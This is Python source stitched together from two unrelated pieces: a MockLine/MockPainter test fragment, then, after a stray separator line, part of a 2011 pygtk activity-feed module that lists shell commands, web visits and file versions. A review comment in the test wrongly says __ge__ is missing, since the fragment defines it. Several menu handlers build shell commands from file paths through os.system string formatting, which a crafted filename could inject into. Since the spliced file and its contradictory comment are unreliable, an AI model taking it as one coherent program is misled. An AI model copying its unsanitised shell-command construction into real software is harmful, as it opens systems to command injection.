        return self._key() < other._key()

    def __le__(self, other):
        return self._key() <= other._key()

    def __gt__(self, other):
        return self._key() > other._key()

    def __ge__(self, other):
        return self._key() >= other._key()
def test_mock_line():
    """Sanity check test to make sure that MockLine works"""
    # l1 and l2 share the same endpoints in opposite order and must be equal.
    l1 = MockLine((1, 2), (3, 4))
    l2 = MockLine((3, 4), (1, 2))
    l3 = MockLine((1, 2), (4, 5))
    l4 = MockLine((1, 2), (0, 10))
    assert l1 == l2
    # NOTE(review): `>=` requires MockLine to define __ge__ (or use
    # functools.total_ordering) -- __lt__ alone does not provide it.
    assert l1 >= l2
    assert l2 >= l1
    assert l1 != l3
    # Ordering compares the sorted endpoint pairs.
    assert l1 < l3
    assert l1 != l4
    assert l4 < l1
class MockPainter:
    """
    Helper class for testing visualization area painting.

    Passed into `paint` in place of a real painter: instead of rendering,
    it records every primitive it is asked to draw so tests can inspect
    exactly what would have been painted.
    """

    def __init__(self):
        # Start with empty recording lists (shared logic with clear()).
        self.clear()

    def setPen(self, pen):
        # Pen state does not affect what gets recorded; ignore it.
        pass

    def pen(self):
        return None

    def setFont(self, font):
        # Font state does not affect what gets recorded; ignore it.
        pass

    def drawEllipse(self, center, rx, ry):
        self.ellipses.append((center.x(), center.y(), rx, ry))

    def drawLine(self, x1, y1, x2, y2):
        self.lines.append(MockLine((x1, y1), (x2, y2)))

    def drawText(self, x, y, text):
        self.texts.append((x, y, text))

    def clear(self):
        # Drop everything recorded so far.
        self.ellipses = []
        self.lines = []
        self.texts = []
|
# Created on 2011-12-08
# implement a (near)real-time feed of user activities, sorta like a
# Facebook Feed or Twitter stream
import pygtk
pygtk.require('2.0')
import gtk, pango, gobject
import os, sys, gc
import datetime
import filecmp
import atexit
from signal import signal, SIGTERM
from pymongo import Connection, ASCENDING, DESCENDING
from pygtk_burrito_utils import *
from BurritoUtils import *
from urlparse import urlparse
from annotation_component import AnnotationComponent
from event_fetcher import *
import source_file_prov_viewer, output_file_prov_viewer
from file_version_manager import FileVersionManager, ONE_SEC
# width (px) of the feed window; also used to size labels/annotators below
WINDOW_WIDTH = 300
FIVE_SECS = datetime.timedelta(seconds=5)
# use the primary X Window clipboard ...
g_clipboard = gtk.Clipboard(selection="PRIMARY")
# Ugh, kludgy globals ... relies on the fact that BurritoFeed is a
# singleton here ... will break down if this isn't the case :)
# left-hand file version selected via 'Select for diff' (see mark_for_diff)
diff_left_half = None # type: FileFeedEvent.FileEventDisplay
# every 'Select for diff' menu item ever created, so their labels can be
# toggled together when a diff selection is made/cleared
diff_menu_items = []
# Key: filename
# Value: FileEventDisplay object which is the baseline version to watch for changes
watch_files = {}
# Key: filename
# Value: timestamp of most recent read to this file
file_read_timestamps = {}
# each elt is a FileWriteEvent instance
# Key: filename
# Value: list of FileWriteEvent instances in sorted order
sorted_write_events = {}
# http://stackoverflow.com/questions/69645/take-a-screenshot-via-a-python-script-linux
def save_screenshot(output_filename):
    """Grab the entire root X window and save it to a PNG file.

    On failure (pixbuf grab returned None) prints an error to stderr
    instead of raising.
    """
    assert output_filename.endswith('.png')
    w = gtk.gdk.get_default_root_window()
    sz = w.get_size()
    pb = gtk.gdk.Pixbuf(gtk.gdk.COLORSPACE_RGB,False,8,sz[0],sz[1])
    pb = pb.get_from_drawable(w,w.get_colormap(),0,0,0,0,sz[0],sz[1])
    if (pb != None):
        pb.save(output_filename, 'png')
        # To prevent a gross memory leak:
        # http://faq.pygtk.org/index.py?req=show&file=faq08.004.htp
        del pb
        gc.collect()
    else:
        print >> sys.stderr, "Failed to save screenshot to", output_filename
# Code taken from: http://stackoverflow.com/questions/1551382/python-user-friendly-time-format
def pretty_date(time=False):
    """
    Get a datetime object or an int() Epoch timestamp and return a
    pretty string like 'an hour ago', 'Yesterday', '3 months ago',
    'just now', etc

    Accepts an int (or Python 2 long) epoch timestamp, a
    datetime.datetime, or a falsy value (treated as "now").
    Returns '' for timestamps in the future.
    """
    from datetime import datetime
    now = datetime.now()
    # Python 2 distinguishes int and long; Python 3 only has int.
    try:
        integer_types = (int, long)
    except NameError:
        integer_types = (int,)
    # exact type() check (not isinstance) so that bools like the default
    # time=False fall through to the 'not time' branch, as before
    if type(time) in integer_types:
        diff = now - datetime.fromtimestamp(time)
    elif isinstance(time, datetime):
        diff = now - time
    elif not time:
        diff = now - now
    else:
        assert False, time
    second_diff = diff.seconds
    day_diff = diff.days
    if day_diff < 0:
        # future timestamp -- nothing sensible to say
        return ''
    if day_diff == 0:
        if second_diff < 10:
            return "just now"
        if second_diff < 60:
            return str(second_diff) + " seconds ago"
        if second_diff < 120:
            return "a minute ago"
        # use floor division: identical in Python 2, and avoids producing
        # strings like '2.5 minutes ago' under Python 3 true division
        if second_diff < 3600:
            return str(second_diff // 60) + " minutes ago"
        if second_diff < 7200:
            return "an hour ago"
        if second_diff < 86400:
            return str(second_diff // 3600) + " hours ago"
    if day_diff == 1:
        return "Yesterday"
    if day_diff < 7:
        return str(day_diff) + " days ago"
    if day_diff < 31:
        return str(day_diff // 7) + " weeks ago"
    if day_diff < 365:
        return str(day_diff // 30) + " months ago"
    return str(day_diff // 365) + " years ago"
# iterates in reverse over a list of FeedEvent instances and terminates
# either when the list ends or when an element's timestamp is older
# than target_time
def gen_reverse_bounded_time_elts(lst, target_time):
    """Yield FeedEvent-like elements of lst newest-first, stopping as soon
    as an element's timestamp is strictly older than target_time (or the
    list is exhausted)."""
    for evt in lst[::-1]:
        if evt.timestamp < target_time:
            break
        yield evt
class FeedEvent:
    """Abstract base for one entry in the activity feed.

    Builds the shared header (icon + gray relative-timestamp label).
    Subclasses are expected to set self.widget and self.timestamp.
    """
    # Pango markup wrapper for the small gray relative-timestamp text
    PANGO_TIMESTAMP_TEMPLATE = '<span font_family="sans" size="8000" foreground="#999999">%s</span>'
    def __init__(self, dt, icon_filename):
        self.timestamp = dt # type datetime.datetime
        event_icon = gtk.Image()
        event_icon.set_from_file(icon_filename)
        # start empty
        timestamp_lalign = gtk.Alignment(0, 0.6, 0, 0)
        timestamp_lab = gtk.Label()
        timestamp_lalign.add(timestamp_lab)
        event_header = create_hbox((event_icon, timestamp_lalign), (0, 5))
        # NOTE(review): show_all_local_widgets is handed locals(), so it
        # presumably show()s the widgets bound to local names -- keep the
        # widget locals above intact.
        show_all_local_widgets(locals())
        self.timestamp_label = timestamp_lab
        self.header = event_header
    def get_widget(self):
        """Return the top-level gtk widget for this feed entry."""
        return self.widget
    def update_timestamp(self):
        """Refresh the header's human-readable 'N minutes ago' label."""
        self.timestamp_label.set_markup(FeedEvent.PANGO_TIMESTAMP_TEMPLATE % pretty_date(self.timestamp))
# represents a user-posted comment
class CommentFeedEvent(FeedEvent):
    """Feed entry for a user-posted comment, with an optional screenshot
    link and a context menu for copying the comment or its hashtag.

    Subclasses set self.event (the underlying annotation event), which
    save_to_db and copy_event_hashtag rely on.
    """
    def __init__(self, comment, dt, icon_filename, screenshot_filename=None):
        FeedEvent.__init__(self, dt, icon_filename)
        self.comment = comment
        context_menu = gtk.Menu()
        copy_item = gtk.MenuItem('Copy comment')
        copy_item.connect("activate", self.copy_comment)
        hashtag_item = gtk.MenuItem('Copy event hashtag')
        hashtag_item.connect("activate", self.copy_event_hashtag)
        context_menu.append(copy_item)
        context_menu.append(hashtag_item)
        lab = gtk.Label(self.comment)
        lab.modify_font(pango.FontDescription("sans 9"))
        lab.set_line_wrap(True) # turn on word-wrapping!
        lab.set_size_request(WINDOW_WIDTH - 35, -1) # request a reasonable initial width
        lab_box = create_clickable_event_box(lab, context_menu)
        comment_event_body = create_alignment(lab_box)
        comment_vbox = gtk.VBox()
        comment_vbox.pack_start(self.header)
        if screenshot_filename:
            # optional 'View screenshot' link between the header and body
            screenshot_link = gtk.Label()
            screenshot_link.set_markup('<span font_family="sans" size="9000"><a href="file://%s">View screenshot</a></span>' % screenshot_filename)
            screenshot_lalign = create_alignment(screenshot_link, ptop=3)
            comment_vbox.pack_start(screenshot_lalign)
        comment_vbox.pack_start(comment_event_body, padding=5)
        # show_all_local_widgets inspects locals(); keep widget locals intact
        show_all_local_widgets(locals())
        self.widget = comment_vbox
        self.update_timestamp()
    def save_to_db(self):
        # self.event is set by subclasses (e.g. StatusUpdateFeedEvent)
        self.event.save_to_db() # polymorphic!
    def copy_comment(self, _ignore):
        g_clipboard.set_text(self.comment)
    def copy_event_hashtag(self, _ignore):
        g_clipboard.set_text(self.event.get_hashtag())
class StatusUpdateFeedEvent(CommentFeedEvent):
    """Feed entry for a plain status update ("what's on your mind?")."""
    def __init__(self, status_update_event):
        self.event = status_update_event
        CommentFeedEvent.__init__(self,
                                  status_update_event.annotation,
                                  status_update_event.timestamp,
                                  "accessories-text-editor-24x24.png")
class HappyFaceFeedEvent(CommentFeedEvent):
    """Feed entry for a 'happy face' annotation, with its screenshot."""
    def __init__(self, happy_face_event):
        self.event = happy_face_event
        CommentFeedEvent.__init__(self,
                                  happy_face_event.annotation,
                                  happy_face_event.timestamp,
                                  "yellow-happy-face-24x24-antialiased.xpm",
                                  happy_face_event.screenshot_filename)
class SadFaceFeedEvent(CommentFeedEvent):
    """Feed entry for a 'sad face' annotation, with its screenshot."""
    def __init__(self, sad_face_event):
        self.event = sad_face_event
        CommentFeedEvent.__init__(self,
                                  sad_face_event.annotation,
                                  sad_face_event.timestamp,
                                  "red-sad-face-24x24-antialiased.xpm",
                                  sad_face_event.screenshot_filename)
# represents a BASH shell event object in the feed
class BashFeedEvent(FeedEvent):
    """Feed entry grouping consecutive shell commands run in one directory.

    Commands are appended chronologically and de-duplicated by their
    full command-line text.
    """
    class BashCommandDisplay:
        """Widget for a single bash invocation: the command text plus an
        annotation component, with a copy/annotate context menu."""
        def __init__(self, bash_cmd_event):
            self.bash_cmd_event = bash_cmd_event # BashCommandEvent instance
            self.cmd_str = ' '.join(bash_cmd_event.cmd)
            self.annotator = AnnotationComponent(WINDOW_WIDTH-50, bash_cmd_event)
            command_context_menu = gtk.Menu()
            cc_item1 = gtk.MenuItem('Copy command')
            cc_item1.connect("activate", self.copy_cmd)
            cc_item2 = gtk.MenuItem('Copy event hashtag')
            cc_item2.connect("activate", self.copy_event_hashtag)
            add_comment_item = gtk.MenuItem('Annotate invocation')
            add_comment_item.connect("activate", self.annotator.show_comment_box)
            command_context_menu.append(cc_item1)
            command_context_menu.append(cc_item2)
            command_context_menu.append(add_comment_item)
            cmd_label = gtk.Label(self.cmd_str)
            cmd_label.modify_font(pango.FontDescription("monospace 8"))
            cmd_label_box = create_clickable_event_box(cmd_label, command_context_menu)
            # full command text in a tooltip, since the label may be clipped
            cmd_label_box.set_has_tooltip(True)
            cmd_label_box.connect('query-tooltip', show_tooltip, self.cmd_str)
            cmd_lalign = create_alignment(cmd_label_box, ptop=2, pbottom=2, pleft=2)
            cmd_vbox = create_vbox((cmd_lalign, self.annotator.get_widget()))
            # show_all_local_widgets inspects locals(); keep widget locals intact
            show_all_local_widgets(locals())
            self.widget = cmd_vbox
        def copy_cmd(self, _ignore):
            g_clipboard.set_text(self.cmd_str)
        def copy_event_hashtag(self, _ignore):
            g_clipboard.set_text(self.bash_cmd_event.get_hashtag())
        def get_widget(self):
            return self.widget
    def copy_pwd(self, _ignore):
        # copy a ready-to-paste 'cd <dir>' command
        g_clipboard.set_text('cd ' + self.pwd)
    def __init__(self, pwd):
        FeedEvent.__init__(self, None, "terminal-24x24-icon.png")
        self.pwd = pwd
        def create_pwd_popup_menu():
            menu = gtk.Menu()
            item = gtk.MenuItem('Copy directory')
            item.connect("activate", self.copy_pwd)
            item.show()
            menu.append(item)
            return menu # don't show() the menu itself; wait for a popup() call
        pwd_popup_menu = create_pwd_popup_menu()
        pwd_display = gtk.Label()
        pwd_display.set_markup('<span underline="single" font_family="monospace" size="9000" foreground="#555555">%s</span>' % prettify_filename(pwd))
        pwd_display.set_has_tooltip(True)
        pwd_display.connect('query-tooltip', show_tooltip, prettify_filename(pwd))
        pwd_display_box = create_clickable_event_box(pwd_display, pwd_popup_menu)
        bash_event_body = gtk.VBox()
        pwd_valign = create_alignment(pwd_display_box, ptop=3, pbottom=4, pleft=1)
        bash_event_body.pack_start(pwd_valign)
        bash_vbox = gtk.VBox()
        bash_vbox.pack_start(self.header)
        bash_vbox.pack_start(bash_event_body)
        show_all_local_widgets(locals())
        # assign these locals to instance vars after they've been shown ...
        self.widget = bash_vbox
        self.events_vbox = bash_event_body
        # full command strings already displayed (for de-duplication)
        self.commands_set = set()
    def add_command_chron_order(self, bash_cmd_event):
        """Append a command assumed to be newer than everything shown so far;
        duplicate command lines only refresh the timestamp."""
        # since we're presumably inserting in chronological order,
        # then update the timestamp when inserting each comment in
        # succession, even if it's already in the collection
        assert not self.timestamp or bash_cmd_event.timestamp > self.timestamp
        self.timestamp = bash_cmd_event.timestamp
        self.update_timestamp()
        cmd_str = ' '.join(bash_cmd_event.cmd)
        # eliminate duplicates
        if cmd_str in self.commands_set:
            return
        self.commands_set.add(cmd_str)
        n = BashFeedEvent.BashCommandDisplay(bash_cmd_event)
        self.events_vbox.pack_start(n.get_widget(), expand=True)
# represents a webpage visit event object in the feed
class WebpageFeedEvent(FeedEvent):
    """Feed entry grouping webpage visits, de-duplicated by URL.

    Each visit renders as '[domain] <clickable title link>' plus an
    annotation component.
    """
    class WebpageDisplay:
        """Widget for a single visited webpage."""
        def __init__(self, webpage_event):
            self.webpage_event = webpage_event # WebpageVisitEvent instance
            self.annotator = AnnotationComponent(WINDOW_WIDTH-50, webpage_event)
            webpage_context_menu = gtk.Menu()
            hashtag_item = gtk.MenuItem('Copy event hashtag')
            hashtag_item.connect("activate", self.copy_event_hashtag)
            add_comment_item = gtk.MenuItem('Annotate web visit')
            add_comment_item.connect("activate", self.annotator.show_comment_box)
            webpage_context_menu.append(hashtag_item)
            webpage_context_menu.append(add_comment_item)
            # make the domain name concise:
            domain_name = urlparse(webpage_event.url).netloc
            if domain_name.startswith('www.'):
                domain_name = domain_name[len('www.'):]
            domain_display = gtk.Label()
            domain_display.set_markup('<span font_family="sans" size="8000" foreground="#666666">[%s] </span>' % domain_name)
            domain_display_box = create_clickable_event_box(domain_display, webpage_context_menu)
            # full URL in a tooltip over the domain
            domain_display_box.set_has_tooltip(True)
            domain_display_box.connect('query-tooltip', show_tooltip, webpage_event.url)
            link_display = gtk.Label()
            # BUGFIX: escape '&' as '&amp;' for Pango markup -- the previous
            # replace('&', '&') was a no-op, so URLs or titles containing a
            # raw ampersand produced invalid markup in set_markup() below
            encoded_url = webpage_event.url.replace('&', '&amp;')
            encoded_title = webpage_event.title.replace('&', '&amp;')
            link_display.set_markup('<span font_family="sans" size="8000"><a href="%s">%s</a></span>' % (encoded_url, encoded_title))
            domain_and_link_display = create_hbox((domain_display_box, link_display))
            webpage_display_lalign = create_alignment(domain_and_link_display, ptop=2, pbottom=1, pleft=1)
            disp_vbox = create_vbox((webpage_display_lalign, self.annotator.get_widget()))
            # show_all_local_widgets inspects locals(); keep widget locals intact
            show_all_local_widgets(locals())
            self.widget = disp_vbox
        def copy_event_hashtag(self, _ignore):
            g_clipboard.set_text(self.webpage_event.get_hashtag())
        def get_widget(self):
            return self.widget
    def __init__(self):
        FeedEvent.__init__(self, None, "google-chrome.png")
        webpage_event_body = gtk.VBox()
        webpage_vbox = gtk.VBox()
        webpage_vbox.pack_start(self.header)
        webpage_vbox.pack_start(webpage_event_body)
        show_all_local_widgets(locals())
        self.widget = webpage_vbox
        self.webpage_event_body = webpage_event_body
        # URLs already displayed (for de-duplication)
        self.stored_URLs = set()
    def add_webpage_chron_order(self, webpage_event):
        """Append a webpage visit assumed to be at least as new as everything
        shown so far; duplicate URLs only refresh the timestamp."""
        # since we're presumably inserting in chronological order,
        # then update the timestamp when inserting each comment in
        # succession, even if it's already in the collection
        assert not self.timestamp or webpage_event.timestamp >= self.timestamp
        self.timestamp = webpage_event.timestamp
        self.update_timestamp()
        # eliminate dups (but still update timestamp unconditionally)
        if webpage_event.url in self.stored_URLs:
            return
        self.stored_URLs.add(webpage_event.url)
        n = WebpageFeedEvent.WebpageDisplay(webpage_event)
        self.webpage_event_body.pack_start(n.get_widget())
# max width (px) for doodle thumbnails; wider images are scaled down
# proportionally in DoodleFeedEvent.load_thumbnail
THUMBNAIL_WIDTH = 250
class DoodleFeedEvent(FeedEvent):
    """Feed entry for a saved doodle image, shown as a clickable thumbnail
    that opens the full-size historical version of the file."""
    def __init__(self, doodle_event, fvm):
        FeedEvent.__init__(self, doodle_event.timestamp, 'mypaint.png')
        self.doodle_event = doodle_event # type: DoodleSaveEvent
        self.timestamp = doodle_event.timestamp
        self.update_timestamp()
        # FileVersionManager, used to check out historical file versions
        self.fvm = fvm
        thumbnail = gtk.Image()
        thumbnail_lalign = create_alignment(thumbnail, ptop=3, pbottom=4)
        thumbnail_event_box = gtk.EventBox()
        thumbnail_event_box.add(thumbnail_lalign)
        set_white_background(thumbnail_event_box)
        # show a hand cursor over the thumbnail to signal clickability
        thumbnail_event_box.connect('realize',
                                    lambda e:e.window.set_cursor(g_handcursor))
        thumbnail_event_box.connect("button_press_event", self.load_fullsize_image)
        doodle_vbox = gtk.VBox()
        doodle_vbox.pack_start(self.header)
        doodle_vbox.pack_start(thumbnail_event_box)
        # show_all_local_widgets inspects locals(); keep widget locals intact
        show_all_local_widgets(locals())
        self.widget = doodle_vbox
        self.thumbnail = thumbnail # don't load the image just yet!
    def load_thumbnail(self):
        """Check out the correct historical version of the doodle file and
        display it, scaled to at most THUMBNAIL_WIDTH pixels wide."""
        # regular behavior:
        if self.doodle_event.filename in sorted_write_events:
            # ok, we need to grab the version of the file that existed after
            # self.timestamp and BEFORE the next write to that file, since the
            # user might have CLOBBERED this doodle image file with newer doodles,
            # so self.filename might not be correct (or it could be non-existent!)
            filename = self.fvm.checkout_file_before_next_write(self.doodle_event,
                                                                sorted_write_events[self.doodle_event.filename])
        else:
            # if we don't have sorted_write_events, just use the following
            # approximation ...
            filename = self.fvm.checkout_file(self.doodle_event.filename,
                                              self.doodle_event.timestamp + datetime.timedelta(seconds=5))
        assert filename
        # resize the doodle down to a respectable size
        # http://faq.pygtk.org/index.py?req=show&file=faq08.006.htp
        pixbuf = gtk.gdk.pixbuf_new_from_file(filename)
        w = pixbuf.get_width()
        h = pixbuf.get_height()
        if w > THUMBNAIL_WIDTH:
            # scale down preserving aspect ratio
            scaled_buf = pixbuf.scale_simple(THUMBNAIL_WIDTH,
                                             int(float(THUMBNAIL_WIDTH) * float(h) / float(w)),
                                             gtk.gdk.INTERP_BILINEAR)
            self.thumbnail.set_from_pixbuf(scaled_buf)
        else:
            self.thumbnail.set_from_file(filename)
        self.thumbnail.show()
    def load_fullsize_image(self, _ignore, _ignore2):
        """Open the historical doodle version in the system's image viewer."""
        if self.doodle_event.filename in sorted_write_events:
            # dynamically generate the filename since the path might have
            # changed (due to new writes ... tricky and subtle!)
            filename = self.fvm.checkout_file_before_next_write(self.doodle_event,
                                                                sorted_write_events[self.doodle_event.filename])
        else:
            filename = self.fvm.checkout_file(self.doodle_event.filename,
                                              self.doodle_event.timestamp + datetime.timedelta(seconds=5))
        assert filename
        os.system('gnome-open "%s" &' % filename)
class FileFeedEvent(FeedEvent):
    """Feed entry grouping file provenance events from one process.

    Subclasses choose the icon: FileObservedFeedEvent (reads) and
    FileMutatedFeedEvent (writes/renames). Each file shown gets its own
    FileEventDisplay with a rich context menu (diff, open, revert, watch).
    """
    class FileEventDisplay:
        """Widget for one file within a FileFeedEvent, backed by historical
        versions checked out through the FileVersionManager."""
        def __init__(self, file_provenance_event, parent):
            self.file_provenance_event = file_provenance_event
            self.parent = parent # sub-class of FileFeedEvent
            self.fvm = parent.fvm # instance of FileVersionManager
            self.annotator = AnnotationComponent(WINDOW_WIDTH-50, file_provenance_event)
            file_context_menu = gtk.Menu()
            diff_cur_item = gtk.MenuItem('Diff against latest')
            diff_cur_item.connect("activate", self.diff_with_latest)
            diff_pred_item = gtk.MenuItem('Diff against predecessor')
            diff_pred_item.connect("activate", self.diff_with_predecessor)
            mark_diff = gtk.MenuItem('Select for diff')
            mark_diff.connect("activate", self.mark_for_diff)
            # register this menu item globally so its label can be toggled
            # when a diff selection is made (see mark_for_diff)
            global diff_menu_items
            diff_menu_items.append(mark_diff)
            view = gtk.MenuItem('Open')
            view.connect("activate", self.open_to_view, 'current')
            view_pred = gtk.MenuItem('Open predecessor')
            view_pred.connect("activate", self.open_to_view, 'predecessor')
            revert_current = gtk.MenuItem('Revert to current')
            revert_current.connect("activate", self.revert, 'current')
            revert_pred = gtk.MenuItem('Revert to predecessor')
            revert_pred.connect("activate", self.revert, 'predecessor')
            watch_me = gtk.MenuItem('Watch for changes')
            watch_me.connect("activate", self.watch_for_changes)
            view_source_prov = gtk.MenuItem('View source file provenance')
            view_source_prov.connect("activate", self.view_source_prov)
            view_output_prov = gtk.MenuItem('View output file provenance')
            view_output_prov.connect("activate", self.view_output_prov)
            # not implemented yet
            item5 = gtk.MenuItem('Ignore file')
            item6 = gtk.MenuItem('Ignore directory')
            copy_filename_item = gtk.MenuItem('Copy filename')
            copy_filename_item.connect("activate", self.copy_filename)
            hashtag_item = gtk.MenuItem('Copy event hashtag')
            hashtag_item.connect("activate", self.copy_event_hashtag)
            add_comment_item = gtk.MenuItem('Annotate file version')
            add_comment_item.connect("activate", self.annotator.show_comment_box)
            separator1 = gtk.SeparatorMenuItem()
            separator2 = gtk.SeparatorMenuItem()
            separator3 = gtk.SeparatorMenuItem()
            separator4 = gtk.SeparatorMenuItem()
            file_context_menu.append(copy_filename_item)
            file_context_menu.append(hashtag_item)
            file_context_menu.append(add_comment_item)
            file_context_menu.append(separator1)
            file_context_menu.append(diff_cur_item)
            file_context_menu.append(diff_pred_item)
            file_context_menu.append(mark_diff)
            file_context_menu.append(separator2)
            file_context_menu.append(view)
            file_context_menu.append(view_pred)
            file_context_menu.append(watch_me)
            file_context_menu.append(separator3)
            file_context_menu.append(revert_current)
            file_context_menu.append(revert_pred)
            file_context_menu.append(separator4)
            file_context_menu.append(view_source_prov)
            file_context_menu.append(view_output_prov)
            #file_context_menu.append(item5)
            #file_context_menu.append(item6)
            # only show base path in label for brevity
            file_label = gtk.Label(os.path.basename(self.file_provenance_event.filename))
            file_label.modify_font(pango.FontDescription("monospace 8"))
            file_label_box = create_clickable_event_box(file_label, file_context_menu)
            # ... but show FULL file path in tooltip
            file_label_box.set_has_tooltip(True)
            file_label_box.connect('query-tooltip', show_tooltip, prettify_filename(self.file_provenance_event.filename))
            icon_and_label_box = gtk.HBox()
            icon_and_label_box.pack_end(file_label_box, expand=False)
            file_lalign = create_alignment(icon_and_label_box, ptop=2, pbottom=2, pleft=2)
            file_vbox = create_vbox((file_lalign, self.annotator.get_widget()))
            # show_all_local_widgets inspects locals(); keep widget locals intact
            show_all_local_widgets(locals())
            self.widget = file_vbox
            self.icon_and_label_box = icon_and_label_box
            self.watchme_icon_alignment = None # lazily allocate to save memory
            # if this file is being watched, compare the watched baseline
            # against the file's current contents and decorate the label
            global watch_files
            try:
                old_version_path = watch_files[self.file_provenance_event.filename].checkout_and_get_path()
                if os.path.exists(old_version_path):
                    if not filecmp.cmp(old_version_path, self.file_provenance_event.filename):
                        # there's a diff!
                        changed_icon = gtk.Image()
                        changed_icon.set_from_file('red-exclamation-point-16x16.png')
                        changed_icon.show()
                        changed_icon_alignment = create_alignment(changed_icon, pright=3)
                        changed_icon_alignment.show()
                        self.icon_and_label_box.pack_end(changed_icon_alignment)
                        file_label.modify_fg(gtk.STATE_NORMAL, gtk.gdk.Color('#800517')) # make it red!
                    else:
                        # 'passed' the informal regression test set by watchfile
                        test_pass_icon = gtk.Image()
                        test_pass_icon.set_from_file('tasque-check-box.png')
                        test_pass_icon.show()
                        test_pass_icon_alignment = create_alignment(test_pass_icon, pright=3)
                        test_pass_icon_alignment.show()
                        self.icon_and_label_box.pack_end(test_pass_icon_alignment)
            except KeyError:
                # file isn't being watched -- nothing to decorate
                pass
        def get_widget(self):
            return self.widget
        def get_filename(self):
            return self.file_provenance_event.filename
        def copy_filename(self, _ignore):
            g_clipboard.set_text(self.file_provenance_event.filename)
        def copy_event_hashtag(self, _ignore):
            g_clipboard.set_text(self.file_provenance_event.get_hashtag())
        def checkout_and_get_path(self):
            """Check out this event's version (before the file's next write)
            and return its path."""
            return self.fvm.checkout_file_before_next_write(self.file_provenance_event,
                                                            sorted_write_events[self.file_provenance_event.filename])
        # to find the predecessor, simply check out the file one second
        # before the write occurred ...
        #
        # TODO: this isn't exactly correct, since you could've had a bunch
        # of coalesced writes, so you might want to get the version BEFORE
        # the series of coalesced writes.
        def checkout_predecessor_and_get_path(self):
            return self.fvm.checkout_file(self.get_filename(),
                                          self.file_provenance_event.timestamp - ONE_SEC)
        def diff_with_latest(self, _ignore):
            # requires the 'meld' visual diff tool to be installed
            old_version_path = self.checkout_and_get_path()
            fn = self.file_provenance_event.filename
            os.system('meld "%s" "%s" &' % (old_version_path, fn))
        def diff_with_predecessor(self, _ignore):
            post_write_path = self.checkout_and_get_path()
            predecessor_path = self.checkout_predecessor_and_get_path()
            os.system('meld "%s" "%s" &' % (predecessor_path, post_write_path))
        def mark_for_diff(self, _ignore):
            """Two-click diff: first activation selects this version as the
            left half; the second (on any file) diffs the pair in meld."""
            global diff_left_half, diff_menu_items # KLUDGY!
            if diff_left_half:
                diff_right_half_path = self.checkout_and_get_path()
                diff_left_half_path = diff_left_half.checkout_and_get_path()
                os.system('meld "%s" "%s" &' % (diff_left_half_path, diff_right_half_path))
                # RESET!
                diff_left_half = None
                for e in diff_menu_items:
                    e.set_label('Select for diff')
            else:
                diff_left_half = self
                for e in diff_menu_items:
                    e.set_label('Diff against selected file')
        def open_to_view(self, _ignore, option):
            # option = 'current' or 'predecessor'
            if option == 'current':
                old_version_path = self.checkout_and_get_path()
            elif option == 'predecessor':
                old_version_path = self.checkout_predecessor_and_get_path()
            else:
                assert False
            # gnome-open to the rescue!!! uses a file's type to determine the
            # proper viewer application :)
            if not os.path.isfile(old_version_path):
                create_popup_error_dialog("File not found:\n" + old_version_path)
            else:
                os.system('gnome-open "%s" &' % old_version_path)
        def view_source_prov(self, _ignore):
            global cur_session
            spv = source_file_prov_viewer.SourceFileProvViewer(self.get_filename(), cur_session, self.fvm)
        def view_output_prov(self, _ignore):
            global cur_session # KLUDGY!
            print 'view_output_prov:', self.get_filename(), cur_session
            opv = output_file_prov_viewer.OutputFileProvViewer(self.get_filename(), cur_session, self.fvm)
        def watch_for_changes(self, _ignore):
            """Toggle a watchpoint on this file: future versions get compared
            against this baseline and decorated accordingly."""
            global watch_files
            fn = self.file_provenance_event.filename
            if fn in watch_files:
                # un-watch the other file:
                other = watch_files[fn]
                assert other.watchme_icon_alignment
                other.icon_and_label_box.remove(other.watchme_icon_alignment)
                # if other is actually self, then un-watch!
                if other == self:
                    del watch_files[fn]
                    return # PUNTTT!
            watch_files[fn] = self
            # "freeze" the enclosing FileMutatedFeedEvent object when you
            # create a watchpoint so that subsequent writes don't coalesce into
            # this FileMutatedFeedEvent entry and possibly destroy the current
            # FileEventDisplay object in the # process!
            self.parent.frozen = True
            watchme_icon = gtk.Image()
            watchme_icon.set_from_file('magnifying-glass-16x16.png')
            watchme_icon.show()
            self.watchme_icon_alignment = create_alignment(watchme_icon, pright=3)
            self.watchme_icon_alignment.show()
            self.icon_and_label_box.pack_end(self.watchme_icon_alignment)
        # option = 'current' or 'predecessor'
        def revert(self, _ignore, option):
            """Overwrite the live file with a historical version, after a
            yes/no confirmation dialog."""
            if option == 'current':
                old_version_path = self.checkout_and_get_path()
            elif option == 'predecessor':
                old_version_path = self.checkout_predecessor_and_get_path()
            else:
                assert False
            if not os.path.isfile(old_version_path):
                create_popup_error_dialog("File not found:\n" + old_version_path)
            else:
                # pop-up a confirmation dialog before taking drastic action!
                d = gtk.MessageDialog(None,
                                      gtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT,
                                      gtk.MESSAGE_QUESTION,
                                      gtk.BUTTONS_YES_NO,
                                      message_format="Are you sure you want to revert\n\n %s\n\nto\n\n %s" % \
                                      (self.get_filename(), old_version_path))
                d.show()
                response = d.run()
                d.destroy()
                if response == gtk.RESPONSE_YES:
                    # VERY INTERESTING: the 'cp' command sometimes doesn't work
                    # for NILFS, since it thinks that the snapshot version is
                    # IDENTICAL to the latest current version of the file and will
                    # thus refuse to do the copy even though their contents are
                    # clearly different.
                    #
                    # Thus, we will do a super-hack where we copy the file to
                    # tmp_blob and then rename it to the real filename ...
                    tmp_blob = '/tmp/tmp-reverted-file'
                    revert_cmd = "cp '%s' '%s'; mv '%s' '%s'" % (old_version_path, tmp_blob,
                                                                 tmp_blob, self.get_filename())
                    os.system(revert_cmd)
    def revert_all_files_to_pred(self, _ignore):
        """Revert every file in this entry to its predecessor version."""
        for v in self.contents.itervalues():
            v.revert(None, 'predecessor')
    def watch_all_files(self, _ignore):
        """Set a watchpoint on every file in this entry."""
        for v in self.contents.itervalues():
            v.watch_for_changes(None)
    def __init__(self, process_name, fvm, icon_filename):
        FeedEvent.__init__(self, None, icon_filename)
        self.process_name = process_name
        self.fvm = fvm
        self.frozen = False # if frozen, then don't allow any more coalescing into it!
        def create_proc_popup_menu():
            menu = gtk.Menu()
            #item1 = gtk.MenuItem('Ignore process')
            revert_all = gtk.MenuItem('Revert all files to predecessors')
            revert_all.connect('activate', self.revert_all_files_to_pred)
            revert_all.show()
            watch_all_files = gtk.MenuItem('Watch all files for changes')
            watch_all_files.connect('activate', self.watch_all_files)
            watch_all_files.show()
            menu.append(watch_all_files)
            menu.append(revert_all)
            return menu # don't show() the menu itself; wait for a popup() call
        proc_display = gtk.Label()
